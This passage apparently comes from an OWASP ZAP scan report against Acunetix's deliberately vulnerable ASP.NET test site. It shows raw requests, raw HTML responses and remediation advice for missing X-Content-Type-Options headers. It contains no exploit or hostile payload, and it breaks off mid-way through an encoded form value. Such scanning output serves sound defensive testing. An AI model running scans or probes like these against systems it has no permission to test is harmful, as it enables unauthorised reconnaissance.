href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        27. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        28. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3R